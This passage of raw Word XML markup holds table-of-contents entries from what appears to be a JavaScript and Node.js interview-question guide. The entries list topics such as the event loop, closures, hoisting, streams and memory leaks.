                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>How does Node.js support multi-processor platforms, and does it fully utilize all processor resources?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54</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1353D25D" w14:textId="1572493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39" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is typically the first argument passed to a Node.js callback handler?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_Toc178383239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54</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="11B9F7FB" w14:textId="73721CF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40" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is the preferred method of resolving unhandled exceptions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54</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="266B0285" w14:textId="4C62E68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41" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>The time required to run this code in Google Chrome is considerably more than the time required to run it in Node.js. Explain why this is so, even though both use the v8 JavaScript Engine.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55</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="724C73D7" w14:textId="4743878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42" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is “callback hell” and how can it be avoided?</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55</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A0502E7" w14:textId="096566C8"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43" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Miscellaneous Topics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55</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D4D453D" w14:textId="2B78AA3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44" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Swagger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55</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08660F9A" w14:textId="25D72796"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45" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>General Questions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58</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E7143A3" w14:textId="1AA5167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46" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is Browser Storage?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58</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6A3CA2FF" w14:textId="6C49FA5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47" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is a prototype chain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59</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="33460839" w14:textId="4291E3E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48" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is the Temporal Dead Zone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60</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20B648A7" w14:textId="1B1EC84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49" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is Immediately Invoked Function Expression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_Toc178383249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61</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0C0DEF42" w14:textId="516CDB3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0" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is memorization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61</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0DA0807C" w14:textId="7B8BA57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1" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is Hoisting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62</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="616DCFCA" w14:textId="0E5BDFF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2" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What are closures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63</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4CC961CE" w14:textId="2C4D2BB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3" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What are server-sent events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64</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="64BA0B7A" w14:textId="7F2AE86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4" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Why do you need strict mode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66</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="505739E3" w14:textId="64575DA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5" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is event bubbling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67</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3D5488E4" w14:textId="6E251C0A"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6" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>How do you generate random integers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67</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F145AFB" w14:textId="57B88B2B"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7" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is the purpose of freeze method</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68</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7AF34C50" w14:textId="64E2D70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8" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is V8 JavaScript engine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69</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="62C38016" w14:textId="71FA711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59" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is destructuring assignment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_Toc178383259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69</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0115C2E8" w14:textId="4F55B36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60" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What are streams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69</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3AE2FBDF" w14:textId="6615345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61" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is JWT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69</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="30E57FB1" w14:textId="41861AC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62" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is the difference between for, foreach, map, filter and reduce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69</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F607AE5" w14:textId="66FC3996"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63" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Event Loop</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71</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="63579BF9" w14:textId="66A4D60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64" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Can you explain in detail the phases of the Node.js event loop? Describe what happens in each phase.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71</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3307982B" w14:textId="1CB2D51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65" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is the event loop in Node.js, and why is it important?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72</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="45657500" w14:textId="193A78C8"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66" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What happens in the timers phase of the event loop?</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73</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6046507F" w14:textId="4A21378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67" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is the difference between setImmediate() and setTimeout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73</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="048B0DA1" w14:textId="417B231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68" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>How can you prevent the event loop from being blocked?</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73</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="659685C5" w14:textId="1DC3246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69" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What are micro and macro task queues?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_Toc178383269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74</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A96BDD1" w14:textId="331B236D"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70" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Memory Management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75</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="63FCE04D" w14:textId="4E947948"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71" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is a memory leak and how to detect and diagnose it.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75</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7735E0F5" w14:textId="03ED124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72" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is the process.memoryUsage() method, and what information does it provide?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76</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
